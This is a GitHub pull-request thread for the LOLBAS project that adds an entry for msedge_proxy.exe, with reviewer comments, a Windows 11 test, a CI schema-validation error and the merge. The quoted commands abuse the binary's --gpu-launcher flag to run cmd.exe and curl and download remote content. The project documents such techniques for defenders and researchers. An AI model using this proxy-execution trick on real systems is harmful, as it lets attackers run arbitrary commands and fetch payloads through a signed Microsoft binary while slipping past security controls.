Create msedge_proxy.yml
LOLBAS-Project/LOLBAS pull request #320
Opened 2023-08-18 14:31 UTC by mertdas

2023-09-03 18:40 UTC, josehelps requested changes

2023-09-03 18:40 UTC, josehelps commented on yml/OSBinaries/msedge_proxy.yml
> +  - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&"
might be worth mentioning the full path here: 

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

2023-09-03 18:40 UTC, josehelps commented on yml/OSBinaries/msedge_proxy.yml
> +  - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&"
here is a suggested updated example `"C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&"`

2023-09-03 18:56 UTC, josehelps commented
Successfully tested on Win 11
![image](https://github.com/LOLBAS-Project/LOLBAS/assets/1476868/3c5dd7a5-cff7-4b9f-bd81-d80c3c9257a5)

2023-09-03 19:05 UTC, mertdas commented
> Successfully tested on Win 11 ![image](https://user-images.githubusercontent.com/1476868/265283642-3c5dd7a5-cff7-4b9f-bd81-d80c3c9257a5.png)

thank you

2023-09-05 15:07 UTC, josehelps approved these changes
LGTM thank you @mertdas

2023-09-05 15:49 UTC, mertdas commented
> LGTM thank you @mertdas although CI is failing due to a missing field:
> 
> ```
>  INFO - linting yml/OSBinaries/msedge_proxy.yml
> Traceback (most recent call last):
>   File "/usr/local/bin/pykwalify", line 8, in <module>
>     sys.exit(cli_entrypoint())
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/cli.py", line 98, in cli_entrypoint
>     run(parse_cli())
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/cli.py", line 85, in run
>     c.validate()
>   File "/usr/local/lib/python3.9/site-packages/pykwalify/core.py", line 194, in validate
>     raise SchemaError(u"Schema validation failed:\n - {error_msg}.".format(
> pykwalify.errors.SchemaError: <SchemaError: error code 2: Schema validation failed:
>  - Cannot find required key 'Full_Path'. Path: ''.: Path: '/'>
>  ERROR - validation.invalid
>  ERROR -  --- All found errors ---
>  ERROR - ["Cannot find required key 'Full_Path'. Path: ''"]
> ```

it's finally ready :)

2023-09-05 17:26 UTC, merged